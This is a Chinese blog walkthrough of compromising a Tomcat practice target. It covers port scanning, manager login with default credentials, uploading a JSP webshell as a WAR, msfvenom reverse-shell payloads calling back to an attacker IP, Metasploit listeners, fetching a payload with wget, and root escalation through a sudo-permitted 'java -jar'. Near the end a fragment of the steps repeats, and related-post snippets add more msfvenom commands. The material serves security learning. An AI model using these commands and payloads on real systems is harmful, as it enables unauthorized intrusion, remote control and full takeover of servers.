tomcat 靶机

最新推荐文章于 2024-09-22 13:28:04 发布
原创 最新推荐文章于 2024-09-22 13:28:04 发布 · 2.3k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux #服务器 #运维

本文详述了针对Tomcat靶机的信息收集过程,包括主机发现、端口扫描和服务识别。接着,通过蚁剑连接和MSF工具,利用文件上传漏洞部署war包并获取shell。最后,通过生成和执行jar包实现提权,最终获取root权限。

文章目录

tomcat 靶机

1.信息收集

1.1 主机发现

netdiscover

目标IP地址

192.168.81.151

image-20220325085211797

1.2 端口扫描

masscan --rate=1000 -p 0-65535 192.168.81.151

收集到有两个端口是开放的

22
8080

image-20220325085445785

1.3 端口服务识别

nmap -sV -T4 -O 192.168.81.151 -p 22,8080

可以看到

  • 22端口:ssh服务
  • 8080端口:http服务

image-20220325085629890

直接进入8080端口,发现服务器版本信息

http://192.168.81.151:8080/

image-20220325093428273

1.4 御剑扫描

192.168.81.151:8080

扫描到的网址

http://192.168.81.151:8080/manager

image-20220325090210796

打开网址,打开网址的时候会弹出一个登录窗体

http://192.168.81.151:8080/manager

image-20220325090441522

默认密码为

账户:tomcat
密码:tomcat

登录之后我们就进入了管理员界面

image-20220325093726847

2.漏洞探测

2.1 文件上传漏洞

从管理员界面我们可以看到一个可以上传文件的地方

但只能上传.war结尾的文件

image-20220325095056068

2.1 蚁剑连接

2.1.1 木马文件生成

用中国蚁剑中的插件进行生成

  • 在蚁剑连接过的网络中,点击鼠标【右键】–【加载插件】–【默认分类】
  • 可以看到里面有两个生成Shell的功能
  • 任选其一即可

在这里我选择了【生成Shell】

在这里我们选择生成【JSP】格式的Shell

image-20220112183844770

点击之后

  • 弹出一个可以设置密码的文本框,里面有一个随机生成的密码

  • 可以自定义修改密码

  • 这里我修改成了xxb

image-20220112184011888

生成的Shell如下

  • 按住 【Ctrl+A】全选
  • 【Ctrl+C】进行复制
  • 然后【Ctr+V】粘贴到文本文件中
  • 把后缀改为.jsp即可生成Shell文件

image-20220112184144320

生成的文件名为 xxb.jsp

2.1.2 部署war包

把刚才生成的文件进行压缩

压缩后把压缩后的文件后缀改为 .war

image-20220325105407066

上传包含.jsp文件的war文件

image-20220325095839562

2.1.3 查看文件位置

Applications中可以看到我们刚才上传的木马文件

  • 而我们的木马文件则在这个目录下面
  • 也就是我们刚才.war的文件名 xxb下面
  • 再加上我们刚才生成的.jsp的这个文件名
  • 就构造了我们可以用蚁剑进行连接的URL

image-20220325095757196

2.1.4 蚁剑连接

http://192.168.81.151:8080/xxb/xxb.jsp

连接成功

image-20220325100017190

查看一下我们上传的文件路径

find / -name xxb.war

路径为:

/usr/local/tomcat9/webapps/xxb.war

cd /usr/local/tomcat9/webapps

image-20220325100358988

2.2 MSF直接反弹

2.2.1 使用MSF生成war包

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.81.131 LPORT=4444 -f war > shell.war

通过我们进入的管理员界面进行文件上传

把生成的文件拖到物理机上进行上传

文件名为:

shell.war

image-20220325110615871

上传文件

image-20220325110808291

找到执行的文件路径为

http://192.168.81.151:8080/shell

image-20220325110954485

2.2.2 msf反弹shell

kali设置监听

msfconsole
use exploit/multi/handler
set payload java/jsp_shell_reverse_tcp
set LHOST 192.168.81.131
set LPORT 4444
exploit

执行我们刚才上传的war包

访问war包文件名目录

http://192.168.81.151:8080/shell

image-20220325111449811

输入

shell

直接getshell

获得shell之后直接进行第4个提权即可

3.getshell

3.1 上传木马文件

MSF生成木马文件,木马文件名为

4444.elf

msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.81.131 lport=4444 -f elf  >4444.elf

image-20220325101302437

3.2 kali监听

在目录home/xxb创建linux.rc文件,并添加下列内容

vim linux.rc  #创建文件

添加的内容如下

use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.81.131
set LPORT 4444
exploit

image-20220318151533016

服务端监听,监听后在蚁剑上运行我们上传的木马文件

msfconsole  -qr /home/xxb1/linux.rc

蚁剑运行木马文件

chmod +x 4444.elf
./4444.elf

image-20220325101520823

3.3 获得shell

shell

image-20220325101707728

3.4 切换终端

获取shell后,切换python终端

python -c 'import pty;pty.spawn("/bin/bash")'

image-20220325102000605

使用

sudo -l

命令时

  • 可以看到靶机sudo权限可以执行的命令
  • 可以看到sudo权限可以执行java

4.提权

4.1 生成jar包

在目录 home/xxb1 用MSF生成一个jar

msfvenom —platform java -f jar -p java/shell_reverse_tcp LHOST=192.168.81.131 LPORT=7777 -o payload.jar

image-20220325103623313

在目录 home/xxb1 开启临时服务器

python2 -m SimpleHTTPServer 1234

image-20220325103654560

4.2 靶机下载

切换到我们刚才获得的shell界面

然后执行下列命令

wget http://192.168.81.131:1234/payload.jar

已经成功下载文件

image-20220325103920953

注意

  • 若下载不成功

  • 则切换文件目录到 /usr/local/tomcat9/webapps

  • 命令

  • cd /usr/local/tomcat9/webapps

  • 然后再进行下载就可以了

4.3 MSF执行jar包

MSF进行监听

msfconsole
use exploit/multi/handler
set payload java/shell_reverse_tcp
set LHOST 192.168.81.131
set LPORT 7777
exploit

切换到我们刚才获得的shell界面

执行jar包

sudo -u root java -jar payload.jar

image-20220325104739357

返回MSF界面

已成功反弹新的shell

image-20220325104911921

4.4 获取root权限

输入

id

查看当前用户权限为 root

image-20220325105056818

ole
use exploit/multi/handler
set payload java/shell_reverse_tcp
set LHOST 192.168.81.131
set LPORT 7777
exploit


切换到我们刚才获得的shell界面

执行jar包

sudo -u root java -jar payload.jar


[外链图片转存中...(img-hI0H0VkW-1648178539831)]

返回MSF界面

已成功反弹新的shell

[外链图片转存中...(img-8I4nUJMW-1648178539831)]



## 4.4 获取root权限

输入

id


查看当前用户权限为 root

[外链图片转存中...(img-KJjfYaph-1648178539832)]
网络安全工具AntSword蚁剑内存使用
SHELLCODE_8BIT的博客
09-04 2318
测试环境:tomcat9、蚁剑、蚁剑后渗透插件。
免杀对抗-java语言-shellcode免杀-源码修改+打包exe
xiaoheizi的博客
09-21 1455
命令:msfvenom -p java/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxxx -f jar -o msf.jar。1.点击启动jd-gui,将生成msf.jar拖入其中进行反编译,点击file—save all sources导出反编译后的内容。1.将exe4j打包的exe程序再使用inno工具和jdk环境打包合并到一起,将文件上传目标系统,成功绕过检测。命令:jar cvfm 名称.jar META-INF/MANIFEST.MF .
Tomcat本地提权漏洞
小小猪的博客
11-19 2126
Tomcat本地提权漏洞 漏洞分析: 其实这个漏洞影响范围挺广泛的,基本所有使用了deb包的liunx操作系统都会有受到影响,包括不限于ubuntu,debian等,但是利用条件确实比较苛刻,在实际环境中比较难达到。 这个漏洞的原因就出现在tomcat的安装deb包上,当用户使用apt-get方式安装tomcat时。tomcat程序会自动为管理员安装一个启动脚本/etc/init.d/tocat*,当攻击者通过web或者其他途径拿到tomcat的权限时,就可以任意操作tomcat日志目录下的cata
msf渗透练习-生成控制window系统
weixin_49349476的博客
06-12 5295
利用kali的msf工具生成window木,对目标window主机进行控制,本次练习仅用于学习,不要用于非法用途(做个好白帽)
Tomcat靶机渗透
weixin_56306210的博客
12-28 3271
Tomcat靶机渗透
msfvenom常用参数
m0_61506558的博客
08-29 1940
列出指定模块的所有可用资源,模块类型包括: payloads, encoders, nops, all。例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。设定有效攻击荷载的最大长度生成payload的最大长度,就是文件大小。保护模板程序的动作,注入的payload作为一个新的进程运行。指定需要使用的encoder(编码器)编码免杀。指定需要使用的payload(攻击荷载)。...
tomcat靶机
最新发布
03-28
### 如何搭建或配置 Tomcat 靶机环境 #### 安装 Apache Tomcat 要安装并配置 Apache Tomcat,可以按照以下方式操作: 1. **下载与解压** 访问官方站点下载最新版本的 Apache Tomcat 并将其解压缩到目标目录。...
安装部署Web安全测试用的靶机
11-24
为了进行有效的测试,我们需要模拟真实的环境,这就是靶机的作用。本实验旨在通过安装部署Web安全测试靶机,包括DVWA、MCIR、Pikachu、mutillidae和BWAPP,来提供一个安全学习和实践的平台。 首先,安装XAMPP,这是...
Tomcat 靶场攻略
2301_82061181的博客
09-22 1010
步骤一:环境搭建docker ps步骤二:漏洞复现步骤二:首页进行抓包Tomcat允许适⽤put⽅法上传任意⽂件类型,但不允许jsp后缀⽂件上传,因此我们需要配合 windows的步骤三:Webshell客户端⼯具进行连接。
kali-渗透攻击tomcat服务
m0_71171042的博客
05-30 1834
连接数据库 —— db_connect user:pass@host:port/(或者指定配置文件完整路径,/usr/share/metasploit-framework/config/database.yml)设置要测试的用户名字(可以是单个,也可以是一个字典)10**USER_PASS_FILE**:使用 "用户名/密码" 格式的字典文件11**USER_AS_PASS**:尝试使用测试中的用户名作为密码。是世界上使用最广泛的java web应用服务器之一,绝大多数人都会使用tomcat的默认配置。
vulhub靶场-tomcat漏洞复现
m0_62008601的博客
07-23 2102
tomcat漏洞复现合集
CVE-2016-1240(Tomcat本地提权漏洞分析与复现)
Fly_鹏程万里
05-04 3291
前言 Tomcat是个运行在Apache上的应用服务器,支持运行Servlet/JSP应用程序的容器——可以将Tomcat看作是Apache的扩展,实际上Tomcat也可以独立于Apache运行。 Tomcat于2016年10月1日曝出本地提权漏洞CVE-2016-1240。仅需Tomcat用户低权限,攻击者就能利用该漏洞获取到系统的ROOT权限。而且该漏洞的利用难度并不...
【网络安全】 MSF生成教程
一直被模仿,从未被超越
03-13 2403
1、当客户端点击木后,Kali 成功获取。2、启动Apache,方便客户端下载。1、在Kali机器上面生成。本例用的是 Themida。二、Kali 开启监听。2、设置Payload。
msfvenom生成各类Payload命令
Alvin的博客
02-22 1429
    msfvenom生成各类Payload命令     Often one of the most useful(and to the beginner underrated) abilities of Metasploit is the msfpayload module. Multiple payloads can be created with this module and it ...
msfvenom java_msfvenom
weixin_32463071的博客
02-28 317
因为比赛需要,自学了一下msfvenom,可能会断断续续或者不完整,仅作参考。在kali2.0的环境上,因为msfpayload没有了,被整合进了msfvenom,所以这就只写一些关于msfvenom的东西。这里就只是记录下生成一个程序的过程。msfvenommsfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成程序,并在目标机上执行,在本地监听上线0x...
jar反编译工具_给哥斯拉 webshell 管理工具加后门
weixin_42520132的博客
12-14 1164
Java 反编译是分析 Java 程序的基本手段,也是对一些 Java 程序二次开发的基本前提,可用于反编译的工具有很多,比如 JD-GUI,CRF 等,个人比较常用的是 IntelliJ IDEA 自带的反编译功能,其功能足够强大,能够完成大多数需求。本文简单介绍通过反编译 MSF 生成 java 后门和 WebShell 管理工具哥斯拉,并用最简单的方式将后门加入哥斯拉中。MSF 的...
Tomcat 远程代码执行/提权漏洞(CVE-2019-0232)复现
Ciyaso的博客
05-08 1533
一.漏洞概述 该漏洞存在于启用了enableCmdLineArguments选项的CGI Servlet中,与JRE向Windows传递参数过程中的bug有关。成功利用此漏洞可允许远程攻击者在目标服务器上执行任意命令,从而导致服务器被完全控制。由于Apache Tomcat应用范围广泛,该漏洞一旦被大规模利用,带来后果将不堪设想。 触发该漏洞需要同时满足以下条件: 系统为Windows 启用了CGI Servlet(默认为关闭) 启用了enableCmdLineArguments(Tomcat
tomcat系统登录部署漏洞—msf破解及war包部署getshell
Sea_Sand息禅
04-11 2056
跟着大佬学习的,如有问题,欢迎指教。 tomcat是一个很常见的java web application服务器 此次实验漏洞:很多用户在设置后台管理员账号密码的时候用了系统默认的配置,这使登录容易被破解 0x00:环境部署 1、java环境,以便运行xmapp 2、xmapp下载:https://www.apachefriends.org/index.html 3、运行xmapp的tomc...
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值